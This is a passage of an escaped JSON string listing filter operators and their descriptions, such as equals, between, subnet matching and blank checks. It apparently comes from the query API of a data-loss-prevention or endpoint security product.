\\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"mac_not_match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not match any of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"mac_match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches one of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notBetween\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"in_subnet\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches subnet mask\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches one of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"between\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is between\\\"\\r\\n \\r\\n  
},\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_in_subnet\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not match subnet mask\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not match any of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_in_ipv6_subnet\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not match subnet mask\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notBetween\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches one of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"in_ipv6_subnet\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches subnet mask\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"between\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_gt\\\"\\r\\n \\r\\n  
},\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_ne\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_equals\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_mega_le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_mega_le\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"beforeNow\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is before now\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"olderThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"olderThanAbsolute\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is earlier than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThanFull\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is within the last full\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThanAbsolute\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is later than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"between\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  
{\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absNewerThanAbsolute_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absNewerThanAbsolute_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absOlderThanAbsolute_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absOlderThanAbsolute_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absBetween_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absBetween_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"discovery_inventory_with_classification_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"discovery_inventory_with_classification_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_many2many_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_many2many_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_many2many_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_many2many_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"discovery_inventory_without_classification_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"discovery_inventory_without_classification_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_resolution_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_resolution_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": 
\\\"udlp_ne_resolution_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_resolution_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_gt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_equals\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_le\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_ne\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_kilo_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_kilo_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": 
\\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_epo_user_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_epo_user_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_epo_user_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_epo_user_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"like\\\",\\r\\n \\r\\n  
\\\"description\\\": \\\"Contains pattern\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_contains_words_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_contains_words_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": 
\\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"threatcategory_belongs\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"threatcategory_belongs\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"threatcategory_not_belongs\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"threatcategory_not_belongs\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_reviewer_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_reviewer_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_reviewer_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_reviewer_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does 
not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_status_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_status_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_status_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_status_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  
\\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_InnerSelect_contains_all_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_InnerSelect_contains_all_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_InnerSelect_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_InnerSelect_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_InnerSelect_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_InnerSelect_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isNull\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"isNull\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  
{\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_equals\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_le\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_ne\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_gt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_giga_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_giga_ge\\\"\\r\\n \\r\\n  }\\r\\n \\r\\n ]\"",
